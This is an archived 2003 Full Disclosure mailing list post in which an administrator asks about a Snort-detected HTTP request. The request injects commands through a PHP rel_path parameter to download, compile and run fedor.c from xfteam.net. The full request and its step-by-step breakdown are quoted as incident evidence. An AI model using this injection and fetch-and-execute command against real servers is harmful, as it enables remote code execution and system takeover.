Full Disclosure mailing list archives
http://xfteam.net/fedor.c - Anyone seen this before??
From: Dan <dan () lockedbox net>
Date: Mon, 24 Nov 2003 09:28:22 +0000
Hi, Our Snort picked up an interesting attempt to download, compile and execute. Noting also the fact that the sub dir its attempting to access has not been there for over 4 months(/logjam/)? Has anyone actually seen what this fedor.c is? I have done some google'ing but it comes up blank. Has anyone else noticed this kindof request recently? Is it just me or is xfteam.net not resolving anyway? Orignal HTTP request: GET /logjam/showhits.php? rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f Breaking this down we get(twice): uname -a cd /tmp wget http://xfteam.net/fedor.c gcc -o f fedor.c ./f Regards, Daniel. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- http://xfteam.net/fedor.c - Anyone seen this before?? Dan (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? Robert Jaroszuk (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? gml (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? kang () insecure ws (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? kang () insecure ws (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? Dan (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? kang () insecure ws (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? gml (Nov 24)
- <Possible follow-ups>
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? root (Nov 24)